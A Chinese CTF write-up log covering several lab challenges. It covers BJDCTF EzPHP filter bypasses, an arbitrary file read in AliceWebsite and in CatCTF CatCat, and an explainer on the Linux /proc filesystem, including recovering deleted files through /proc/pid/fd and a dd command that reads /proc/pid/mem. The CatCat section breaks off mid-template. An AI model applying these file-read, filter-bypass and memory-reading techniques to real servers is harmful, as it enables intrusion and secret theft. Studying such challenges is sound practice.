刷题记录23-1-11

[BJDCTF2020]EzPHP

查看源代码

1
2
<!-- Here is the real page =w= -->
<!-- GFXEIM3YFZYGQ4A= -->

base32解码1nD3x.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
<?php
highlight_file(__FILE__);
error_reporting(0);

$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';

echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";

if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}

if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');

if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}

if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");


if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>

第一个if

1
2
3
4
5
6
if($_SERVER) { 
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}

地图炮版基本过滤,就在那里恶心人
url编码过去

1
2
3
4
5
6
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');

过正则,又要不全等于,前面正则匹配,加个换行就行了

1
2
3
4
5
6
if($_REQUEST) { 
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}

$_REQUEST特性

当我只传入?aaa=111此时$_REQUEST=array(1) { ["aaa"]=> string(3) "111" },如果我再同时POST一个aaa=123时候,$_REQUEST=array(1) { ["aaa"]=> string(3) "123" }
利用这个特性覆写

1
2
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");

data伪协议覆写,记得POST覆盖一下

1
2
3
4
5
6
7
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}

数组报错绕过,获得关键extract($_GET["flag"]);

1
2
3
4
5
6
7
if(preg_match('/^[a-z0-9]*$/isD', $code) || 
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>

create_function()此处include flag.php大胆猜测flag在变量中,可以直接输出所有的变量

["ffffffff11111114ggggg"]=> string(89) "Baka, do you think it's so easy to get my flag? I hid the real flag in rea1fl4g.php

取反绕过,伪协议读取rea1fl4g.php

[网鼎杯 2020 半决赛]AliceWebsite

?action疑似任意文件读取,貌似伪协议读不出来,读取一下/start.sh

1
#!/bin/bash if [[ -f /flag.sh ]]; then source /flag.sh fi apache2-foreground

寄,投机取巧没成功,flag.sh被删了

整了一圈啥都没弄到,看了眼wp

妈的,直接包含../../flag

  
 CTF WEB RCE

浅谈python与proc

0x00 如果python open了一个文件,发生了什么?

从进程的I/O来看,这个文件会先被缓存(buffered),这意味着在写入这个文件之前,它会被保存在一个临时的位置,而你对它的一切更改都是在更改这个缓存文件,python并不会清空这个缓存区除非程序确定你完成了对这个文件的修改,比如你把这个文件close()了

如果你写入了一个文件,但并没有close,数据并不会被修改,比如:

1
2
3
4
5
6

with open('file.txt','r') as file:
#对文件的任何操作

file.close() #如果没有这个步骤,那么对文件的修改并不会被保存下来

0x01 /proc目录

Linux 内核提供了一种通过 /proc 文件系统,在运行时访问内核内部数据结构、改变内核设置的机制。proc文件系统是一个伪文件系统,它只存在内存当中,而不占用外存空间。它以文件系统的方式为访问系统内核数据的操作提供接口。

用户和应用程序可以通过proc得到系统的信息,并可以改变内核的某些参数。由于系统的信息,如进程,是动态改变的,所以用户或应用程序读取proc文件时,proc文件系统是动态从系统内核读出所需信息并提交的。下面列出的这些文件或子文件夹,并不是都是在你的系统中存在,这取决于你的内核配置和装载的模块。另外,在/proc下还有三个很重要的目录:net,scsi和sys。 Sys目录是可写的,可以通过它来访问或修改内核的参数,而net和scsi则依赖于内核配置。例如,如果系统不支持scsi,则scsi 目录不存在。

除了以上介绍的这些,还有的是一些以数字命名的目录,它们是进程目录。系统中当前运行的每一个进程都有对应的一个目录在/proc下,以进程的 PID号为目录名,它们是读取进程信息的接口。而self目录则是读取进程本身的信息接口,是一个link

目录 作用
/proc/buddyinfo 每个内存区中的每个order有多少块可用,和内存碎片问题有关
/proc/cmdline 启动时传递给kernel的参数信息
/proc/cpuinfo cpu的信息
/proc/crypto 内核使用的所有已安装的加密密码及细节
/proc/devices 已经加载的设备并分类
/proc/dma 已注册使用的ISA DMA频道列表
/proc/execdomains Linux内核当前支持的execution domains
/proc/fb 帧缓冲设备列表,包括数量和控制它的驱动
/proc/filesystems 内核当前支持的文件系统类型
/proc/interrupts x86架构中的每个IRQ中断数
/proc/iomem 每个物理设备当前在系统内存中的映射
/proc/ioports 一个设备的输入输出所使用的注册端口范围
/proc/kcore 代表系统的物理内存,存储为核心文件格式,里边显示的是字节数,等于RAM大小加上4kb
/proc/kmsg 记录内核生成的信息,可以通过/sbin/klogd或/bin/dmesg来处理
/proc/loadavg 根据过去一段时间内CPU和IO的状态得出的负载状态,与uptime命令有关
/proc/locks 内核锁住的文件列表
/proc/mdstat 多硬盘,RAID配置信息(md=multiple disks)
/proc/meminfo RAM使用的相关信息
/proc/misc 其他的主要设备(设备号为10)上注册的驱动
/proc/modules 所有加载到内核的模块列表
/proc/mounts 系统中使用的所有挂载
/proc/mtrr 系统使用的Memory Type Range Registers (MTRRs)
/proc/partitions 分区中的块分配信息
/proc/pci 系统中的PCI设备列表
/proc/slabinfo 系统中所有活动的 slab 缓存信息
/proc/stat 所有的CPU活动信息
/proc/sysrq-trigger 使用echo命令来写这个文件的时候,远程root用户可以执行大多数的系统请求关键命令,就好像在本地终端执行一样。要写入这个文件,需要把/proc/sys/kernel/sysrq不能设置为0。这个文件对root也是不可读的
/proc/uptime 系统已经运行了多久
/proc/swaps 交换空间的使用情况
/proc/version Linux内核版本和gcc版本
/proc/bus 系统总线(Bus)信息,例如pci/usb等
/proc/driver 驱动信息
/proc/fs 文件系统信息
/proc/ide ide设备信息
/proc/irq 中断请求设备信息
/proc/net 网卡设备信息
/proc/scsi scsi设备信息
/proc/tty tty设备信息
/proc/net/dev 显示网络适配器及统计信息
/proc/vmstat 虚拟内存统计信息
/proc/vmcore 内核panic时的内存映像
/proc/diskstats 取得磁盘信息
/proc/schedstat kernel调度器的统计信息
/proc/zoneinfo 显示内存空间的统计信息,对分析虚拟内存行为很有用

|
以下是/proc目录中进程N的信息

目录 描述
/proc/N pid为N的进程信息
/proc/N/cmdline 进程启动命令
/proc/N/cwd 链接到进程当前工作目录
/proc/N/environ 进程环境变量列表
/proc/N/exe 链接到进程的执行命令文件
/proc/N/fd 包含进程相关的所有的文件描述符
/proc/N/maps 与进程相关的内存映射信息
/proc/N/mem 指代进程持有的内存,不可读
/proc/N/root 链接到进程的根目录
/proc/N/stat 进程的状态
/proc/N/statm 进程使用的内存的状态
/proc/N/status 进程状态信息,比stat/statm更具可读性
/proc/self 链接到当前正在运行的进程
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
-r--r--r--   1 root root    0 Jan  5 14:48 buddyinfo
dr-xr-xr-x 4 root root 0 Jan 5 10:05 bus
-r--r--r-- 1 root root 0 Jan 5 14:48 cgroups
-r--r--r-- 1 root root 0 Jan 5 14:48 cmdline
-r--r--r-- 1 root root 0 Jan 5 14:48 consoles
-r--r--r-- 1 root root 0 Jan 5 14:48 cpuinfo
-r--r--r-- 1 root root 0 Jan 5 14:48 crypto
-r--r--r-- 1 root root 0 Jan 5 14:48 devices
-r--r--r-- 1 root root 0 Jan 5 14:48 diskstats
-r--r--r-- 1 root root 0 Jan 5 14:48 dma
dr-xr-xr-x 2 root root 0 Jan 5 14:48 driver
-r--r--r-- 1 root root 0 Jan 5 14:48 execdomains
-r--r--r-- 1 root root 0 Jan 5 14:48 fb
-r--r--r-- 1 root root 0 Jan 5 14:47 filesystems
dr-xr-xr-x 6 root root 0 Jan 5 10:05 fs
-r--r--r-- 1 root root 0 Jan 5 14:48 interrupts
-r--r--r-- 1 root root 0 Jan 5 14:48 iomem
-r--r--r-- 1 root root 0 Jan 5 14:48 ioports
dr-xr-xr-x 25 root root 0 Jan 5 10:05 irq
-r--r--r-- 1 root root 0 Jan 5 14:48 kallsyms
crw-rw-rw- 1 root root 1, 3 Jan 5 10:05 kcore
-r--r--r-- 1 root root 0 Jan 5 14:48 key-users
crw-rw-rw- 1 root root 1, 3 Jan 5 10:05 keys
-r-------- 1 root root 0 Jan 5 14:48 kmsg
-r-------- 1 root root 0 Jan 5 14:48 kpagecgroup
-r-------- 1 root root 0 Jan 5 14:48 kpagecount
-r-------- 1 root root 0 Jan 5 14:48 kpageflags
-r--r--r-- 1 root root 0 Jan 5 14:48 loadavg
-r--r--r-- 1 root root 0 Jan 5 14:48 locks
-r--r--r-- 1 root root 0 Jan 5 14:48 mdstat
-r--r--r-- 1 root root 0 Jan 5 14:48 meminfo
-r--r--r-- 1 root root 0 Jan 5 14:48 misc
-r--r--r-- 1 root root 0 Jan 5 14:48 modules
lrwxrwxrwx 1 root root 11 Jan 5 14:48 mounts -> self/mounts
-rw-r--r-- 1 root root 0 Jan 5 14:48 mtrr
lrwxrwxrwx 1 root root 8 Jan 5 14:48 net -> self/net
-r-------- 1 root root 0 Jan 5 14:48 pagetypeinfo
-r--r--r-- 1 root root 0 Jan 5 14:48 partitions
dr-xr-xr-x 2 root root 0 Jan 5 14:48 pressure
crw-rw-rw- 1 root root 1, 3 Jan 5 10:05 sched_debug
-r--r--r-- 1 root root 0 Jan 5 14:48 schedstat
drwxrwxrwt 2 root root 40 Jan 5 10:05 scsi
lrwxrwxrwx 1 root root 0 Jan 5 10:05 self -> 4932
-r-------- 1 root root 0 Jan 5 14:48 slabinfo
-r--r--r-- 1 root root 0 Jan 5 14:48 softirqs
-r--r--r-- 1 root root 0 Jan 5 14:48 stat
-r--r--r-- 1 root root 0 Jan 5 14:48 swaps
dr-xr-xr-x 1 root root 0 Jan 5 10:05 sys
--w------- 1 root root 0 Jan 5 10:05 sysrq-trigger
dr-xr-xr-x 2 root root 0 Jan 5 14:48 sysvipc
lrwxrwxrwx 1 root root 0 Jan 5 10:05 thread-self -> 4932/task/4932
crw-rw-rw- 1 root root 1, 3 Jan 5 10:05 timer_list
dr-xr-xr-x 4 root root 0 Jan 5 14:48 tty
-r--r--r-- 1 root root 0 Jan 5 14:48 uptime
-r--r--r-- 1 root root 0 Jan 5 14:48 version
-r--r--r-- 1 root root 0 Jan 5 14:48 version_signature
-r-------- 1 root root 0 Jan 5 14:48 vmallocinfo
-r--r--r-- 1 root root 0 Jan 5 14:48 vmstat
-r--r--r-- 1 root root 0 Jan 5 14:48 zoneinfo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
-r--r--r--   1 root root 0 Jan  5 14:48 arch_status
dr-xr-xr-x 2 root root 0 Jan 5 14:48 attr
-rw-r--r-- 1 root root 0 Jan 5 14:48 autogroup
-r-------- 1 root root 0 Jan 5 14:48 auxv
-r--r--r-- 1 root root 0 Jan 5 14:48 cgroup
--w------- 1 root root 0 Jan 5 14:48 clear_refs
-r--r--r-- 1 root root 0 Jan 5 14:48 cmdline
-rw-r--r-- 1 root root 0 Jan 5 14:48 comm
-rw-r--r-- 1 root root 0 Jan 5 14:48 coredump_filter
-r--r--r-- 1 root root 0 Jan 5 14:48 cpuset
lrwxrwxrwx 1 root root 0 Jan 5 14:48 cwd -> /
-r-------- 1 root root 0 Jan 5 14:48 environ
lrwxrwxrwx 1 root root 0 Jan 5 14:48 exe -> /usr/bin/python3.10
dr-x------ 2 root root 0 Jan 5 14:48 fd
dr-x------ 2 root root 0 Jan 5 14:48 fdinfo
-rw-r--r-- 1 root root 0 Jan 5 14:48 gid_map
-r-------- 1 root root 0 Jan 5 14:48 io
-r--r--r-- 1 root root 0 Jan 5 14:48 limits
-rw-r--r-- 1 root root 0 Jan 5 14:48 loginuid
dr-x------ 2 root root 0 Jan 5 14:48 map_files
-r--r--r-- 1 root root 0 Jan 5 14:48 maps
-rw------- 1 root root 0 Jan 5 14:48 mem
-r--r--r-- 1 root root 0 Jan 5 14:48 mountinfo
-r--r--r-- 1 root root 0 Jan 5 14:48 mounts
-r-------- 1 root root 0 Jan 5 14:48 mountstats
dr-xr-xr-x 6 root root 0 Jan 5 14:48 net
dr-x--x--x 2 root root 0 Jan 5 14:48 ns
-r--r--r-- 1 root root 0 Jan 5 14:48 numa_maps
-rw-r--r-- 1 root root 0 Jan 5 14:48 oom_adj
-r--r--r-- 1 root root 0 Jan 5 14:48 oom_score
-rw-r--r-- 1 root root 0 Jan 5 14:48 oom_score_adj
-r-------- 1 root root 0 Jan 5 14:48 pagemap
-r-------- 1 root root 0 Jan 5 14:48 patch_state
-r-------- 1 root root 0 Jan 5 14:48 personality
-rw-r--r-- 1 root root 0 Jan 5 14:48 projid_map
lrwxrwxrwx 1 root root 0 Jan 5 14:47 root -> /
-rw-r--r-- 1 root root 0 Jan 5 14:48 sched
-r--r--r-- 1 root root 0 Jan 5 14:48 schedstat
-r--r--r-- 1 root root 0 Jan 5 14:48 sessionid
-rw-r--r-- 1 root root 0 Jan 5 14:48 setgroups
-r--r--r-- 1 root root 0 Jan 5 14:48 smaps
-r--r--r-- 1 root root 0 Jan 5 14:48 smaps_rollup
-r-------- 1 root root 0 Jan 5 14:48 stack
-r--r--r-- 1 root root 0 Jan 5 14:48 stat
-r--r--r-- 1 root root 0 Jan 5 14:48 statm
-r--r--r-- 1 root root 0 Jan 5 14:48 status
-r-------- 1 root root 0 Jan 5 14:48 syscall
dr-xr-xr-x 3 root root 0 Jan 5 14:48 task
-r--r--r-- 1 root root 0 Jan 5 14:48 timers
-rw-rw-rw- 1 root root 0 Jan 5 14:48 timerslack_ns
-rw-r--r-- 1 root root 0 Jan 5 14:48 uid_map
-r--r--r-- 1 root root 0 Jan 5 14:48 wchan

0x02 如果python open了一个文件,/proc 发生了什么?

运行如下代码:

1
2
3
4
5
6
7
8
import os

print(os.getpid())
flag = open('./flag','r')
os.remove('./flag')

b = input() #阻止Python运行结束

来到pid目录下的/fd目录

1
2
3
4
5
6
7
8
root@VM-8-17-ubuntu:/proc/59428/fd# ls -la
total 0
dr-x------ 2 root root 0 Jan 5 23:04 .
dr-xr-xr-x 9 root root 0 Jan 5 23:03 ..
lrwx------ 1 root root 64 Jan 5 23:06 0 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 1 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 2 -> /dev/pts/0
lr-x------ 1 root root 64 Jan 5 23:06 3 -> /home/ubuntu/python/flag

这个时候,使用rm -rf ./flag命令删除,再回到这个目录

1
2
3
4
5
6
7
8
root@VM-8-17-ubuntu:/proc/59428/fd# ls -la
total 0
dr-x------ 2 root root 0 Jan 5 23:04 .
dr-xr-xr-x 9 root root 0 Jan 5 23:03 ..
lrwx------ 1 root root 64 Jan 5 23:06 0 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 1 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 2 -> /dev/pts/0
lr-x------ 1 root root 64 Jan 5 23:06 3 -> '/home/ubuntu/python/flag (deleted)'

如果尝试cat /proc/{pid}/fd/3就可以发现,被删除的flag能被cat出来。

1
2
3
4
5
6
7
8
9
10
11
12
root@VM-8-17-ubuntu:/proc/59428/fd# ls
0 1 2 3
root@VM-8-17-ubuntu:/proc/59428/fd# ls -la
total 0
dr-x------ 2 root root 0 Jan 5 23:04 .
dr-xr-xr-x 9 root root 0 Jan 5 23:03 ..
lrwx------ 1 root root 64 Jan 5 23:06 0 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 1 -> /dev/pts/0
lrwx------ 1 root root 64 Jan 5 23:06 2 -> /dev/pts/0
lr-x------ 1 root root 64 Jan 5 23:06 3 -> '/home/ubuntu/python/flag (deleted)'
root@VM-8-17-ubuntu:/proc/59428/fd# cat 3
testtest

0x03 再进一步?

首先,看一下/proc/$pid/maps
显示$ pid的内存内容以与过程中相同的方式映射,即,伪文件中偏移量x处的字节与过程中地址x处的字节相同。如果在此过程中未映射地址,则从文件中的相应偏移量读取将返回EIO(输入/输出错误)。例如,由于进程中的第一页从未映射过(因此,对NULL指针的引用完全失败,而不是意外访问实际内存),因此读取/proc/$pid/mem的第一个字节总是会产生I / O错误。
找出/proc/$pid/maps映射出了过程存储器的哪些部分。该文件每个映射的区域包含一行,如下所示:

1
2
08048000-08054000 r-xp 00000000 08:01 828061     /bin/cat
08c9b000-08cbc000 rw-p 00000000 00:00 0 [heap]

前两个数字是区域的边界(第一个字节的地址和最后一个字节的地址,以六进制表示)。下一列包含权限,如果这是文件映射,则包含有关文件的一些信息(偏移量,设备,索引节点和名称)。

/proc/{pid}/mem是一个特殊的文件,可以访问这个进程的内存,不过在一般的情况下,这东西我们是没法直接拖出来的,内存是一片庞大的沙漠,在这里我们需要地址给予方向。

1
2
要从/proc/$pid/mem读取的进程必须使用带有r--------标志的/proc/$pid/mem附加到该进程。这是调试器在开始调试进程时所做的工作。这也是ptrace对进程的系统调用所做的。读取器完成对PTRACE_ATTACH的读取后,应通过使用strace标志调用/proc/$pid/mem来断开连接。
观察到的进程一定不能运行。通常,调用ptrace将停止目标进程(它发送PTRACE_DETACH信号),但是存在竞争状态(信号传递是异步的),因此跟踪程序应调用ptrace(PTRACE_ATTACH, …)(如STOP中所述)。以root用户身份运行的进程可以读取任何进程的内存,而无需调用wait,但是必须停止观察到的进程,否则读取仍将返回ptrace(2)。

这一坨鸟语应该都没看懂吧,没错,我也没看懂,所以我拜访了一下chatGPT,不得不说,chatGPT真的比google好用

You can read from and write to this file to access and modify the memory of the process. This can be useful for debugging and troubleshooting purposes.

For example, you can use the dd command to read a block of memory from the /proc/pid/mem file, like this:

1
dd if=/proc/pid/mem bs=1 count=1024 skip=0x1234000

This will read 1024 bytes of memory from the process starting at the address 0x1234000.

Keep in mind that accessing the memory of a process can be dangerous, as it can potentially cause the process to crash or behave unexpectedly. It is generally best to use caution when using the /proc/pid/mem file.

我英语水平不行,我就不翻译了,师傅们应该能看懂

CATCTF CatCat

info路由任意文件读取,读到python源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import os 
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask( __name__, static_url_path='/', static_folder='static' )
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"

if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")

@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])
return render_template("index.html", cats_list=cats_list, cat=cat)

@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
return render_template("detail.html", catname=name, info=cat(filename, start, end))

@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"

if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)

尝试proc/self/fd读环境变量不行,看样子也不是SSTI,想了想,应该是session下手了。

问题来了,uuid4()无法破解

峰回路转,看到cat,尝试读取一下cat.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import os, sys, getopt

def cat(filename, start=0, end=0)->bytes:
data = b''
try:
start = int(start)
end = int(end)
except:
start=0
end=0
if filename != "" and os.access(filename, os.R_OK):
f = open(filename, "rb")
if start >= 0:
f.seek(start)
if end >= start and end != 0:
data = f.read(end-start)
else:
data = f.read()
else:
data = f.read()
f.close()
else:
data = ("File `%s` not exist or can not be read" % filename).encode()
return data

if __name__ == '__main__':
opts,args = getopt.getopt(sys.argv[1:],'-h-f:-s:-e:',['help','file=','start=','end='])
fileName = ""
start = 0
end = 0
for opt_name, opt_value in opts:
if opt_name == '-h' or opt_name == '--help':
print("[*] Help")
print("-f --file File name")
print("-s --start Start position")
print("-e --end End position")
print("[*] Example of reading /etc/passwd")
print("python3 cat.py -f /etc/passwd")
print("python3 cat.py --file /etc/passwd")
print("python3 cat.py -f /etc/passwd -s 1")
print("python3 cat.py -f /etc/passwd -e 5")
print("python3 cat.py -f /etc/passwd -s 1 -e 5")
exit()
elif opt_name == '-f' or opt_name == '--file':
fileName = opt_value
elif opt_name == '-s' or opt_name == '--start':
start = opt_value
elif opt_name == '-e' or opt_name == '--end': end = opt_value
if fileName != "":
print(cat(fileName, start, end))
else:
print("No file to read")

终于露出只因脚了。

把模板拖出来看一看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!DOCTYPE HTML>
<html class="no-js">
<head>
<!-- Basic Page Needs
================================================== -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Cat cat</title>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<!-- Mobile Specific Metas
================================================== -->
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
<link rel="icon" type="image/x-icon" href="images/favicon.ico">
<!-- CSS
================================================== -->
<link href="css/bootstrap.css" rel="stylesheet" type="text/css">
<link href="css/bootstrap-theme.css" rel="stylesheet" type="text/css">
<link href="css/style.css" rel="stylesheet" type="text/css">
<link href="vendor/magnific/magnific-popup.css" rel="stylesheet" type="text/css">
<link href="vendor/owl-carousel/css/owl.carousel.css" rel="stylesheet" type="text/css">
<link href="vendor/owl-carousel/css/owl.theme.css" rel="stylesheet" type="text/css">
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="css/ie.css" media="screen" /><![endif]-->
<link href="css/custom.css" rel="stylesheet" type="text/css"><!-- CUSTOM STYLESHEET FOR STYLING -->
<!-- Color Style -->
<link href="colors/color1.css" rel="stylesheet" type="text/css">
<!-- SCRIPTS
================================================== -->
<script src="js/modernizr.js"></script><!-- Modernizr -->
</head>
<body class="home">
<!--[if lt IE 7]>
<p class="chromeframe">You are using an outdated browser. <a href="http://browsehappy.com/">Upgrade your browser today</a> or <a href="http://www.google.com/chromeframe/?redirect=true">install Google Chrome Frame</a> to better experience this site.</p>
<![endif]-->
<div class="body">
<!-- Start Header -->
<div class="header-wrapper" style="height: 60px">
<header class="site-header">
<div class="container">
<div class="site-tagline">Cat &amp; Many kinds of cats</div>
<a href="#" class="btn btn-default btn-sm" id="contact-info"><i class="fa fa-bars"></i></a>

</div>
</header>

</div>
<!-- End Header -->

<div class="lgray-bg" style="background-image:url(images/leaves3.png); background-repeat:repeat">
<div class="container">
<h4 class="stacked-title" style="background-color:black"><a href="/">Cats</a></h4>

<div class="row">

<div class="col-md-10 col-sm-12">
<div class="feature-block" style="float: left">
<img src="cats/{{catname}}.jpg" alt="{{catname}}">
<h5>{{catname}}</h5>
<p>{{info}}</p>
</div>
</div>

</div>
<div class="spacer-50"></div>
</div>
</div>

<!-- Site Footer -->
<div class="site-footer-bottom">
<div class="container">
<div class="row">
<div class="col-md-6 col-sm-6">
<div class="copyrights-col-left">
<p>&copy; 2022 Cat cat by [email protected]. All Rights Reserved</p>
</div>
</div>
<div class="col-md-6 col-sm-6">
<div class="copyrights-col-right">

</div>
</div>
</div>
</div>
</div>
<a id="back-to-top"><i class="fa fa-angle-double-up"></i></a>
</div>
<script src="js/jquery-2.2.3.min.js"></script> <!-- Jquery Library Call -->
<script src="vendor/magnific/jquery.magnific-popup.min.js"></script> <!-- PrettyPhoto Plugin -->
<script src="js/ui-plugins.js"></script> <!-- UI Plugins -->
<script src="js/helper-plugins.js"></script> <!-- Helper Plugins -->
<script src="vendor/owl-carousel/js/owl.carousel.min.js"></script> <!-- Owl Carousel -->
<script src="js/bootstrap.js"></script> <!-- UI -->
<script src="js/init.js"></script> <!-- All Scripts -->
<script src="vendor/flexslider/js/jquery.flexslider.js"></script> <!-- FlexSlider -->
</body>
</html>

文件都是bytes类型,SSTI没的打,emmmmm

再看看index.html,emm还是毫无用处emmmmm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
<!DOCTYPE HTML>
<html class="no-js">
<head>
<!-- Basic Page Needs
================================================== -->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Cat cat</title>
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">
<!-- Mobile Specific Metas
================================================== -->
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0">
<link rel="icon" type="image/x-icon" href="images/favicon.ico">
<!-- CSS
================================================== -->
<link href="css/bootstrap.css" rel="stylesheet" type="text/css">
<link href="css/bootstrap-theme.css" rel="stylesheet" type="text/css">
<link href="css/style.css" rel="stylesheet" type="text/css">
<link href="vendor/magnific/magnific-popup.css" rel="stylesheet" type="text/css">
<link href="vendor/owl-carousel/css/owl.carousel.css" rel="stylesheet" type="text/css">
<link href="vendor/owl-carousel/css/owl.theme.css" rel="stylesheet" type="text/css">
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="css/ie.css" media="screen" /><![endif]-->
<link href="css/custom.css" rel="stylesheet" type="text/css"><!-- CUSTOM STYLESHEET FOR STYLING -->
<!-- Color Style -->
<link href="colors/color1.css" rel="stylesheet" type="text/css">
<!-- SCRIPTS
================================================== -->
<script src="js/modernizr.js"></script><!-- Modernizr -->
</head>
<body class="home">
<!--[if lt IE 7]>
<p class="chromeframe">You are using an outdated browser. <a href="http://browsehappy.com/">Upgrade your browser today</a> or <a href="http://www.google.com/chromeframe/?redirect=true">install Google Chrome Frame</a> to better experience this site.</p>
<![endif]-->
<div class="body">
<!-- Start Header -->
<div class="header-wrapper" style="height: 60px">
<header class="site-header">
<div class="container">
<div class="site-tagline">Cat &amp; Many kinds of cats</div>
<a href="#" class="btn btn-default btn-sm" id="contact-info"><i class="fa fa-bars"></i></a>

</div>
</header>

</div>
<!-- End Header -->

<div class="lgray-bg" style="background-image:url(images/leaves3.png); background-repeat:repeat">
<div class="container">
<h4 class="stacked-title" style="background-color:black">Cats</h4>

<div class="row">
{% for a_cat in cats_list %}
